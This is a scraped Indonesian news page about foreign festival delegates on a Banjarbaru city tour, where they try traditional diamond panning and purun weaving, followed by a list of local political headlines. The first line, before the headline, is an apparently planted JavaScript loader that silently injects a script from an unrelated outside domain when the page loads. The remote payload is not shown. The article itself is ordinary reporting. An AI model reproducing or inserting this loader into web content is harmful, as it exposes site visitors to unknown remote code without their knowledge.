(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

City Tour di Banjarbaru, Wisatawan Mancanegara Ikut Malinggang Intan hingga Menganyam Purun


KANALKALIMANTAN.COM, BANJARBARU – Wisatawan mancanegara menjajal langsung alat mendulang intan cara tradisional di pendulangan intan Pumpung, Kelurahan Sungai Tiung, Kecamatan Cempaka, Banjarbaru, Sabtu (12/8/2023) siang.

Kedatangan turis mancanegara delegasi Festival Wisata Budaya Internasional 2023 itu mengunjungi pendulangan intan salah satu titik tujuan pariwisata di Kalimantan Selatan (Kalsel).

Rombongan turis asing dari Rumania, Taiwan, dan Korea Selatan, peserta city tour Festival Wisata Budaya Internasional 2023 melihat langsung proses pendulangan intan tradisional yang menjadi pekerjaan harian warga Cempaka.

Baca juga: Tiga Pelajar SDN Kebun Bunga 5 Tampil di FLS2N Jakarta

Bahkan beberapa turis mencoba langsung malinggang atau membersihkan pasir di wadah pendulangan atau biasa disebut linggangan.

Lurah Sungai Tiung, Dedy Wahyudie mengatakan, kedatangan para turus asing di pendulangan intan Pumpung tentu akan menjadi lebih dikenal khalayak luas, baik di Indonesia maupun mancanegara.

“Selanjutnya kami perlu pengembangan, apa yang kita hasilkan dari sini bisa lebih dikembangkan seperti produk UMKM selain hasil dari pendulangan intan ini,” katanya.

Baca juga: Tiga Pelajar SDN Kebun Bunga 5 Tampil di FLS2N Jakarta

Setelah mengunjungi kawasan wisata pendulangan intan Pumpung, rombongan wisatawan mengunjungi destinasi wisata Kampung Purun di Kelurahan Palam.

Turis asing menyaksikan langsung proses pembuatan aneka kerajinan anyaman purun, mulai dari penumbukan batang purun menggunakan mesin tumbuk, pewarnaan, sampai proses penganyaman bilah-bilah purun itu menjadi sebuah kerajinan tangan warga Palam.

Para turis tampak antusias saat mereka mempraktekkan langsung penumbukan batang- purun kemudian langsung menganyamnya.

Baca juga: Paman Birin Lepas Lomba Gerak Jalan

Beberapa dari mereka membeli beberapa hasil kerajinan purun mulai dari tas dan topi purun buatan pengrajin di Kampung Purun.

Rombongan juga singgah ke Mess L Dekranasda Creative Hub sebagai tujuan terakhir city tour mereka di ibu kota Provinsi Kalsel. Disambut langsung Asisten II Ir Puspa Kencana dan Kepala Disporabudpar Kota Banjarbaru Ahmad Yani Makkie.

Para wisatawan dijamu dengan sajian aneka wadai khas Banjar dan kuliner Kota Banjarbaru Nasi Kabuli sembari bersantai dan beristirahat sejenak.

Kepala Disporabudpar Kota Banjarbaru, Ahmad Yani Makkie menyambut baik kunjungan delegasi peserta city tour Festival Wisata Budaya Internasional 2023 ke tiga destinasi wisata di Banjarbaru ini.

Baca juga: Masubah, Wadai Khas Banjarmasin dari Kampung Sungai Jingah

“Kami tentu senang dengan kunjungan ini, mereka bisa mengetahui secara langsung kehidupan dan aktivitas sehari-hari masyarakat di kawasan wisata itu,” ungkap Yani Makkie.

Disisi lain, Yani Makkie juga mengaku bangga Kota Banjarbaru bisa dikenal lebih luas lagi melalui serangkaian kegiatan city tour yang disusun oleh Dinas Pariwisata Provinsi Kalsel. (Kanalkalimantan.com/bie)

Reporter : bie
Editor : kk


Risa

Recent Posts

5 Nama Pendaftar Bacalon Pilwali Banjarbaru ke PDIP

KANALKALIMANTAN.COM, BANJARBARU - Lima buah formulir pendaftaran diambil oleh lima orang bakal calon Pilkada 2024… Read More

2 jam ago

Acil Odah Resmi Lamar Golkar Maju Pilgub Kalsel 2024

KANALKALIMANTAN.COM, BANJARMASIN - Langkah Hj Raudatul Jannah alias Acil Odah untuk maju pada kontestasi Pemilihan… Read More

2 jam ago

Golkar Banjarbaru Buka Penjaringan Bakal Calon Wali Kota

KANALKALIMANTAN.COM, BANJARBARU - DPD Partai Golkar Kota Banjarbaru membuka pendaftaran bakal calon Wali Kota dan… Read More

3 jam ago

Soal Pungutan Acara Perpisahan Siswa, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru menyikapi persoalan iuran kegiatan acara… Read More

6 jam ago

Pungutan Acara Perpisahaan Siswa, Begini Respon Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Menyikapi pungutan acara perpisahan siswa sekolah di Banjarbaru, Wali Kota Banjarbaru Aditya… Read More

7 jam ago

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

18 jam ago

This website uses cookies.